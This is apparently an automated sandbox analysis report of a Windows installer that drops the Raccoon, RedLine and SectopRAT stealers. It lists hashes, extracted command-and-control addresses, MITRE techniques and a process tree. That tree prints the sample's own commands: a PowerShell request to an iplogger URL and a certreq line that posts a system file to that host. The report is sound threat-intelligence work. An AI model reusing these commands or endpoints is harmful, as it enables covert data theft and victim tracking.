raccoon | e545bebf9e0380572b0d7440696cc1c4e687e4c100640f1693c223a91e71b9c5

Analysis

max time kernel
148s
max time network
149s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
23-10-2024 06:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.exe
Size

3.1MB
MD5

6d929b7f6b456a9b24d50dbbfd87624d
SHA1

824445eb19c92eaf624748c3c0fc6e77a7f617a6
SHA256

e545bebf9e0380572b0d7440696cc1c4e687e4c100640f1693c223a91e71b9c5
SHA512

3282d60fa41f0679408053d67e1204c5e9325d7958646ee2e0edc2d06e9bc61b60c51e7e34630eaae051eb6a0371ffa575dd7bc14e2432938285e8c42bb3c1a8
SSDEEP

98304:ZC0zr0EE1XpTjfP8nkinI648yhPymUQ1Xu2HAOcBCkfp:jSEnlnIv8y8mR1Xkfp

Score

10^/10

raccoon redline sectoprat 74bec5afbb1ce85c30df15e910825c3eaa274ac4 venita_test_2k_05.08.21 whitemix ww discovery execution infostealer rat stealer trojan

Malware Config

Extracted

Family

redline

Botnet

WhiteMIX

185.215.113.62:51929

Extracted

Family

redline

Botnet

boterov.com:12427

Extracted

Family

raccoon

Version

1.7.3

Botnet

74bec5afbb1ce85c30df15e910825c3eaa274ac4

Attributes

url4cnc
https://telete.in/berdyshop12

rc4.plain

Extracted

Family

redline

Botnet

Venita_test_2k_05.08.21

yspasenana.xyz:80

Signatures

Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
stealer raccoon

Raccoon Stealer V1 payload 4 IoCs

resource	yara_rule
behavioral1/memory/1672-118-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon_v1
behavioral1/memory/1672-116-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon_v1
behavioral1/memory/1672-113-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon_v1
behavioral1/memory/1672-111-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon_v1

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 15 IoCs

resource	yara_rule
behavioral1/memory/2976-97-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral1/memory/2772-82-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral1/memory/2772-80-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral1/memory/2772-85-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral1/memory/2772-101-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral1/memory/2976-103-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral1/memory/2976-102-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral1/memory/2772-99-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral1/memory/2976-94-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral1/memory/2976-92-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral1/memory/1984-130-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral1/memory/1984-127-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral1/memory/1984-125-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral1/memory/1984-133-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral1/memory/1984-132-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 15 IoCs

resource	yara_rule
behavioral1/memory/2976-97-0x0000000000400000-0x000000000041E000-memory.dmp	family_sectoprat
behavioral1/memory/2772-82-0x0000000000400000-0x000000000041E000-memory.dmp	family_sectoprat
behavioral1/memory/2772-80-0x0000000000400000-0x000000000041E000-memory.dmp	family_sectoprat
behavioral1/memory/2772-85-0x0000000000400000-0x000000000041E000-memory.dmp	family_sectoprat
behavioral1/memory/2772-101-0x0000000000400000-0x000000000041E000-memory.dmp	family_sectoprat
behavioral1/memory/2976-103-0x0000000000400000-0x000000000041E000-memory.dmp	family_sectoprat
behavioral1/memory/2976-102-0x0000000000400000-0x000000000041E000-memory.dmp	family_sectoprat
behavioral1/memory/2772-99-0x0000000000400000-0x000000000041E000-memory.dmp	family_sectoprat
behavioral1/memory/2976-94-0x0000000000400000-0x000000000041E000-memory.dmp	family_sectoprat
behavioral1/memory/2976-92-0x0000000000400000-0x000000000041E000-memory.dmp	family_sectoprat
behavioral1/memory/1984-130-0x0000000000400000-0x000000000041E000-memory.dmp	family_sectoprat
behavioral1/memory/1984-127-0x0000000000400000-0x000000000041E000-memory.dmp	family_sectoprat
behavioral1/memory/1984-125-0x0000000000400000-0x000000000041E000-memory.dmp	family_sectoprat
behavioral1/memory/1984-133-0x0000000000400000-0x000000000041E000-memory.dmp	family_sectoprat
behavioral1/memory/1984-132-0x0000000000400000-0x000000000041E000-memory.dmp	family_sectoprat

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2716	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome updater.exe	6.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome updater.exe	6.exe

Executes dropped EXE 10 IoCs

pid	Process
1728	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp
2832	6.exe
2872	i.exe
2616	l.exe
1960	d.exe
2608	h.exe
2772	d.exe
2976	l.exe
1672	h.exe
1984	i.exe

Loads dropped DLL 6 IoCs

pid	Process
3004	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.exe
1728	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp
1728	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp
1728	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp
1728	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp
1728	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
5	iplogger.org
4	iplogger.org

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 1960 set thread context of 2772	1960	d.exe	42
PID 2616 set thread context of 2976	2616	l.exe	43
PID 2608 set thread context of 1672	2608	h.exe	46
PID 2872 set thread context of 1984	2872	i.exe	47

Drops file in Program Files directory 14 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\My faster4upc\unins000.dat	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp
File created	C:\Program Files (x86)\My faster4upc\is-JGPV8.tmp	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp
File created	C:\Program Files (x86)\My faster4upc\is-3M24F.tmp	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp
File opened for modification	C:\Program Files (x86)\My faster4upc\6.exe	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp
File opened for modification	C:\Program Files (x86)\My faster4upc\h.exe	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp
File created	C:\Program Files (x86)\My faster4upc\is-MJN0K.tmp	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp
File created	C:\Program Files (x86)\My faster4upc\is-FDN65.tmp	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp
File opened for modification	C:\Program Files (x86)\My faster4upc\l.exe	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp
File created	C:\Program Files (x86)\My faster4upc\is-7ATQ4.tmp	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp
File created	C:\Program Files (x86)\My faster4upc\is-BI11B.tmp	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp
File opened for modification	C:\Program Files (x86)\My faster4upc\unins000.dat	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp
File opened for modification	C:\Program Files (x86)\My faster4upc\d.exe	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp
File opened for modification	C:\Program Files (x86)\My faster4upc\i.exe	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp
File created	C:\Program Files (x86)\My faster4upc\is-GJ1SM.tmp	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	l.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	h.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	certreq.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	l.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	h.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	6.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1728	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp
1728	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp
2716	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1728	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	2716	powershell.exe
Token: SeDebugPrivilege	2832	6.exe
Token: SeDebugPrivilege	2976	l.exe
Token: SeDebugPrivilege	2772	d.exe
Token: SeDebugPrivilege	1984	i.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1728	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3004 wrote to memory of 1728	3004	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.exe	30
PID 3004 wrote to memory of 1728	3004	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.exe	30
PID 3004 wrote to memory of 1728	3004	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.exe	30
PID 3004 wrote to memory of 1728	3004	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.exe	30
PID 3004 wrote to memory of 1728	3004	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.exe	30
PID 3004 wrote to memory of 1728	3004	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.exe	30
PID 3004 wrote to memory of 1728	3004	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.exe	30
PID 1728 wrote to memory of 2716	1728	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp	32
PID 1728 wrote to memory of 2716	1728	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp	32
PID 1728 wrote to memory of 2716	1728	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp	32
PID 1728 wrote to memory of 2716	1728	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp	32
PID 1728 wrote to memory of 2956	1728	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp	33
PID 1728 wrote to memory of 2956	1728	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp	33
PID 1728 wrote to memory of 2956	1728	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp	33
PID 1728 wrote to memory of 2956	1728	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp	33
PID 1728 wrote to memory of 2832	1728	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp	35
PID 1728 wrote to memory of 2832	1728	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp	35
PID 1728 wrote to memory of 2832	1728	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp	35
PID 1728 wrote to memory of 2832	1728	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp	35
PID 1728 wrote to memory of 2872	1728	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp	37
PID 1728 wrote to memory of 2872	1728	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp	37
PID 1728 wrote to memory of 2872	1728	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp	37
PID 1728 wrote to memory of 2872	1728	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp	37
PID 1728 wrote to memory of 2616	1728	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp	38
PID 1728 wrote to memory of 2616	1728	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp	38
PID 1728 wrote to memory of 2616	1728	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp	38
PID 1728 wrote to memory of 2616	1728	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp	38
PID 1728 wrote to memory of 1960	1728	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp	39
PID 1728 wrote to memory of 1960	1728	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp	39
PID 1728 wrote to memory of 1960	1728	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp	39
PID 1728 wrote to memory of 1960	1728	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp	39
PID 1728 wrote to memory of 2608	1728	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp	40
PID 1728 wrote to memory of 2608	1728	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp	40
PID 1728 wrote to memory of 2608	1728	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp	40
PID 1728 wrote to memory of 2608	1728	6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp	40
PID 2956 wrote to memory of 1896	2956	cmd.exe	41
PID 2956 wrote to memory of 1896	2956	cmd.exe	41
PID 2956 wrote to memory of 1896	2956	cmd.exe	41
PID 2956 wrote to memory of 1896	2956	cmd.exe	41
PID 1960 wrote to memory of 2772	1960	d.exe	42
PID 1960 wrote to memory of 2772	1960	d.exe	42
PID 1960 wrote to memory of 2772	1960	d.exe	42
PID 1960 wrote to memory of 2772	1960	d.exe	42
PID 1960 wrote to memory of 2772	1960	d.exe	42
PID 2616 wrote to memory of 2976	2616	l.exe	43
PID 2616 wrote to memory of 2976	2616	l.exe	43
PID 2616 wrote to memory of 2976	2616	l.exe	43
PID 2616 wrote to memory of 2976	2616	l.exe	43
PID 1960 wrote to memory of 2772	1960	d.exe	42
PID 1960 wrote to memory of 2772	1960	d.exe	42
PID 1960 wrote to memory of 2772	1960	d.exe	42
PID 1960 wrote to memory of 2772	1960	d.exe	42
PID 2616 wrote to memory of 2976	2616	l.exe	43
PID 2616 wrote to memory of 2976	2616	l.exe	43
PID 2616 wrote to memory of 2976	2616	l.exe	43
PID 2616 wrote to memory of 2976	2616	l.exe	43
PID 2616 wrote to memory of 2976	2616	l.exe	43
PID 2608 wrote to memory of 1672	2608	h.exe	46
PID 2608 wrote to memory of 1672	2608	h.exe	46
PID 2608 wrote to memory of 1672	2608	h.exe	46
PID 2608 wrote to memory of 1672	2608	h.exe	46
PID 2608 wrote to memory of 1672	2608	h.exe	46
PID 2608 wrote to memory of 1672	2608	h.exe	46
PID 2608 wrote to memory of 1672	2608	h.exe	46

C:\Users\Admin\AppData\Local\Temp\6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3004
- C:\Users\Admin\AppData\Local\Temp\is-B8POE.tmp\6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-B8POE.tmp\6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp" /SL5="$30144,3033387,58368,C:\Users\Admin\AppData\Local\Temp\6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:1728
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1lzUx"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2716
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c certreq -post -config https://iplogger.org/1lzUx %windir%\\win.ini %temp%\\2 & del %temp%\\2
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2956
  - - C:\Windows\SysWOW64\certreq.exe
      certreq -post -config https://iplogger.org/1lzUx C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
      4⤵
      System Location Discovery: System Language Discovery
      PID:1896
- - C:\Program Files (x86)\My faster4upc\6.exe
    "C:\Program Files (x86)\My faster4upc\6.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Checks processor information in registry
    - Suspicious use of AdjustPrivilegeToken
    PID:2832
- - C:\Program Files (x86)\My faster4upc\i.exe
    "C:\Program Files (x86)\My faster4upc\i.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:2872
  - - C:\Program Files (x86)\My faster4upc\i.exe
      "C:\Program Files (x86)\My faster4upc\i.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:1984
- - C:\Program Files (x86)\My faster4upc\l.exe
    "C:\Program Files (x86)\My faster4upc\l.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2616
  - - C:\Program Files (x86)\My faster4upc\l.exe
      "C:\Program Files (x86)\My faster4upc\l.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2976
- - C:\Program Files (x86)\My faster4upc\d.exe
    "C:\Program Files (x86)\My faster4upc\d.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1960
  - - C:\Program Files (x86)\My faster4upc\d.exe
      "C:\Program Files (x86)\My faster4upc\d.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2772
- - C:\Program Files (x86)\My faster4upc\h.exe
    "C:\Program Files (x86)\My faster4upc\h.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2608
  - - C:\Program Files (x86)\My faster4upc\h.exe
      "C:\Program Files (x86)\My faster4upc\h.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1672

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\My faster4upc\l.exe

Filesize
852KB

MD5
f1bd777d04ad048a7a1ce3245799530c

SHA1
300cb69859f77c7a8e0787e9d4befaf4bd1ee80b

SHA256
384c256fc08b3763a8aa8dbfd255b348a975575a198b3b443ee594bb5a4d4520

SHA512
eb336c56b0039fc3c40ce2c3c1acf35b213889b33aefab9a9ee63fff398ace5c356f9137752f2f74bfef6a6ebc3335c8f3ba92651c0cee862be3306ffaa81c61

Download Submit
\Program Files (x86)\My faster4upc\6.exe

Filesize
79KB

MD5
13a502c9f8aae935bc791b4e0915cb92

SHA1
96e2e065a9ce134ccfaed69eb98a948e7268dd8c

SHA256
d29f6b6f042629c7f974d78ede2cf65b79d3433dc1d053f9a6a2c1e6c91f7014

SHA512
9454d7ea696287e1b5e8e91890bba8f0299f8e49fe7367a753c97a8efe31264f4f53746245acb3daafcda7420b200d92e224d9ca1d4efc8be1e7cefb18306e0f

Download Submit
\Program Files (x86)\My faster4upc\d.exe

Filesize
866KB

MD5
db2d2f94bcfeb06b85733ce987021631

SHA1
3bc5b711013325389fd9fd48da5bf3b88d334534

SHA256
90a34ff8fafba955d485abc66cd6f696dc44b532634928883a54f95472e26479

SHA512
707f8d9640f832fece1b844ae99d750cd9081ba24d41f922e2fa49bec7b6593fef4ac3116d1d900614fd81d3f2c26e6f6abaea388ba45fa4bdc8569e1d277bcb

Download Submit
\Program Files (x86)\My faster4upc\h.exe

Filesize
1.3MB

MD5
b732e1206cd6538ad6fd98ea0a17afa7

SHA1
3c5eff7e6159e2ca850012dbf345bff7ff480df9

SHA256
9a525086779f276a19bbe2a131cfbd575ade18a4eb6e46f308536d518f0a5210

SHA512
7a7295b869eb9fa3ecd84ee028e12a66629bb507ec0f0c5a5e81061644e5a3335e9d8a0d347d1510a6570d34ee601ab05d79c8611ce5f71df1ecd139d68e5e4f

Download Submit
\Program Files (x86)\My faster4upc\i.exe

Filesize
1021KB

MD5
765fac3632651ffa759112181cff4069

SHA1
f942322b958ceef93beceeed3047a112290af215

SHA256
a7197ddb532acf2a80183545cce111c23feba2cd75356361fe50b5d9a467a0b5

SHA512
896d37822f4a351da2f341e42fb3b71391bb3b424f7f5f2b49e43aa6e760579e8b617dcdbba9d038d11c2cda6df3a48aec22129c5c60176684f3ae6ce4f55455

Download Submit
\Users\Admin\AppData\Local\Temp\is-B8POE.tmp\6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp

Filesize
702KB

MD5
1afbd25db5c9a90fe05309f7c4fbcf09

SHA1
baf330b5c249ca925b4ea19a52fe8b2c27e547fa

SHA256
3bb0ee5569fe5453c6b3fa25aa517b925d4f8d1f7ba3475e58fa09c46290658c

SHA512
3a448f06862c6d163fd58b68b836d866ae513e04a69774abf5a0c5b7df74f5b9ee37240083760185618c5068bf93e7fd812e76b3e530639111fb1d74f4d28419

Download Submit
memory/1672-109-0x0000000000400000-0x0000000000495000-memory.dmp

Filesize
596KB

Download
memory/1672-105-0x0000000000400000-0x0000000000495000-memory.dmp

Filesize
596KB

Download
memory/1672-111-0x0000000000400000-0x0000000000495000-memory.dmp

Filesize
596KB

Download
memory/1672-113-0x0000000000400000-0x0000000000495000-memory.dmp

Filesize
596KB

Download
memory/1672-116-0x0000000000400000-0x0000000000495000-memory.dmp

Filesize
596KB

Download
memory/1672-118-0x0000000000400000-0x0000000000495000-memory.dmp

Filesize
596KB

Download
memory/1672-115-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/1672-107-0x0000000000400000-0x0000000000495000-memory.dmp

Filesize
596KB

Download
memory/1728-11-0x0000000000400000-0x00000000004BF000-memory.dmp

Filesize
764KB

Download
memory/1728-68-0x0000000000400000-0x00000000004BF000-memory.dmp

Filesize
764KB

Download
memory/1728-9-0x0000000000400000-0x00000000004BF000-memory.dmp

Filesize
764KB

Download
memory/1728-60-0x0000000000400000-0x00000000004BF000-memory.dmp

Filesize
764KB

Download
memory/1728-70-0x0000000000400000-0x00000000004BF000-memory.dmp

Filesize
764KB

Download
memory/1960-56-0x0000000001060000-0x000000000113E000-memory.dmp

Filesize
888KB

Download
memory/1960-73-0x0000000006360000-0x00000000063EA000-memory.dmp

Filesize
552KB

Download
memory/1960-74-0x0000000000A70000-0x0000000000A90000-memory.dmp

Filesize
128KB

Download
memory/1984-129-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/1984-123-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/1984-133-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/1984-130-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/1984-132-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/1984-125-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/1984-127-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2608-58-0x0000000000A20000-0x0000000000B66000-memory.dmp

Filesize
1.3MB

Download
memory/2608-63-0x0000000006050000-0x000000000613E000-memory.dmp

Filesize
952KB

Download
memory/2608-104-0x0000000005500000-0x0000000005598000-memory.dmp

Filesize
608KB

Download
memory/2608-64-0x0000000000410000-0x0000000000426000-memory.dmp

Filesize
88KB

Download
memory/2608-87-0x0000000006700000-0x00000000067F0000-memory.dmp

Filesize
960KB

Download
memory/2616-55-0x00000000000A0000-0x000000000017C000-memory.dmp

Filesize
880KB

Download
memory/2616-75-0x00000000005A0000-0x00000000005C0000-memory.dmp

Filesize
128KB

Download
memory/2616-72-0x0000000008000000-0x0000000008088000-memory.dmp

Filesize
544KB

Download
memory/2616-62-0x0000000004280000-0x0000000004302000-memory.dmp

Filesize
520KB

Download
memory/2772-84-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2772-78-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2772-80-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2772-82-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2772-99-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2772-85-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2772-101-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2832-61-0x0000000000C40000-0x0000000000C58000-memory.dmp

Filesize
96KB

Download
memory/2872-65-0x0000000000AF0000-0x0000000000B0A000-memory.dmp

Filesize
104KB

Download
memory/2872-120-0x00000000011A0000-0x00000000011C0000-memory.dmp

Filesize
128KB

Download
memory/2872-119-0x0000000006300000-0x000000000638C000-memory.dmp

Filesize
560KB

Download
memory/2872-57-0x00000000013B0000-0x00000000014B6000-memory.dmp

Filesize
1.0MB

Download
memory/2976-97-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2976-90-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2976-92-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2976-94-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2976-96-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2976-102-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2976-103-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2976-88-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
